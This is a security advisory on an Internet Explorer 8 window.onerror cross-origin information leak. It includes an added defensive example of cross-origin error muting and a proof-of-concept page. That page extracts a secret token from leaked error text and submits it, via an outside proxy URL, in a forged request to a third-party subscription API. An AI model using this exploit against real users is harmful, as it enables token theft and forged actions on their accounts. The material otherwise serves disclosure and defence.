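Affected systems:
Microsoft Internet Explorer 8.0
Description:
Internet Explorer is the web browser bundled by default with the Windows operating system.
Internet Explorer supports the window.onerror callback, which fires whenever a JavaScript parse or runtime error occurs. The callback also fires when www.evil.com has registered its own window.onerror handler and then loads another site with <script src="http://www.bank.com/">, so the error details passed to the handler leak some information from pages on other sites.
<*Source: Chris Evans (chris@ferret.lmh.ox.ac.uk)
Links: http://secunia.com/advisories/41944/
http://scarybeastsecurity.blogspot.com/2010/10/minor-leak-major-headache.html
*>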
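The muting rule that current browsers apply to cross-origin script errors, shown next to the unfiltered behaviour described above, as an added example that is not part of the advisory. The function names and the sample error (including its message text and token) are constructed for illustration.

```javascript
// Added example (not from the advisory). All names and sample values are
// constructed for illustration.

// Error details as a script engine might produce them while parsing a
// response fetched via <script src=...>. The quoted identifier comes from
// the response body, which is why the message text is sensitive.
const SAMPLE_ERROR = {
  message: "'CONSTRUCTED_SECRET_TOKEN' is undefined",
  url: "http://www.bank.com/",
  line: 1,
};

// Behaviour described in the advisory: details are forwarded unchanged,
// whatever origin the failing script was loaded from.
function unfilteredOnerrorArgs(pageUrl, error) {
  return [error.message, error.url, error.line];
}

// Muted behaviour: full details only when the script shares the page's
// origin (scheme, host and port); otherwise a fixed, content-free report.
function mutedOnerrorArgs(pageUrl, error) {
  const pageOrigin = new URL(pageUrl).origin;
  const scriptOrigin = new URL(error.url).origin;
  if (pageOrigin === scriptOrigin) {
    return [error.message, error.url, error.line];
  }
  return ["Script error.", "", 0];
}

// Helper for checks: does any handler argument still carry the secret?
function leaks(args, secret) {
  return args.some((a) => String(a).includes(secret));
}
```

A handler on www.evil.com receives only "Script error.", an empty URL and line 0 under the muted rule, so there is nothing in the message left to parse.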
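Test method:
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!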
<html>
<head>
<script>
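window.onerror = function(msg, url, linenumber) {
  // The value of interest sits between the first pair of single quotes in the error message.
  var i = msg.indexOf("'");
  if (i == -1) {
    alert("Opening quote missing.");
  }
  msg = msg.substring(i + 1);
  i = msg.indexOf("'");
  if (i == -1) {
    alert("Closing quote missing.");
  }
  msg = msg.substring(0, i);
  // Reload and try again unless the extracted value is exactly 22 characters long.
  if (msg.length != 22) {
    document.location.reload();
  }
  // Copy the extracted value into the form field with id "here".
  document.getElementById('here').value = msg;
}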
</script>
</head>
<body>
<button onclick="document.getElementById('form').submit()">CLICK TO GET YOUR GOAT ON - THIS COULD BE AUTOMATED</button>
<form id="form" action="http://www.34baidu.info/proxyie/browse.php?u=fbb19e2a81c10a0384fOi8vd3d3Lmdvb2dsZS5jb20vcmVhZGVyL2FwaS8wL3N1YnNjcmlwdGlvbi9lZGl0P3NvdXJjZT1GRUVEX0ZJTkRFUl9TRUFSQ0hfUkVTVUxUJmNsaWVudD1zY3JvbGw%3D&b=1" method="POST">
<input size=80 type="text" name="s" value="feed/http://beginningfarmers.org/feed/"/>
<p>
<input size=20 type="text" name="ac" value="subscribe"/>
<p>
<input size=20 type="text" name="t" value="About Goat Farming | Beginning Farmers"/>
<p>
<input size=40 type="text" id="here" name="T" value="value pending"/>
</form>
</body>
</html>
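Recommendation:
Vendor patch:
Microsoft
---------
The vendor has not yet released a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: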